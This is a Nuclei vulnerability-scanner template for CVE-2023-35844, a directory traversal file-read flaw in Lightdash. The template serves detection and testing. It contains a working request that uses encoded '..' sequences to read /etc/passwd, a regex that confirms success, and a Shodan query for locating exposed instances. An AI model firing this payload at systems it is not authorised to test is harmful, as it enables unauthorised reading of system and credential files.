nuclei-templates/http/cves/2023/CVE-2023-35844.yaml

35 lines
858 B
YAML

id: CVE-2023-35844
info:
name: Lightdash version <= 0.510.3 Arbitrary File Read
author: dwisiswant0
severity: high
description: |
packages/backend/src/routers in Lightdash before 0.510.3
has insecure file endpoints, e.g., they allow .. directory
traversal and do not ensure that an intended file extension
(.csv or .png) is used.
reference:
- https://advisory.dw1.io/59
- https://nvd.nist.gov/vuln/detail/CVE-2023-35844
metadata:
max-request: 1
shodan-query: title:"Lightdash"
verified: true
tags: cve,cve2023,lightdash,lfi
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200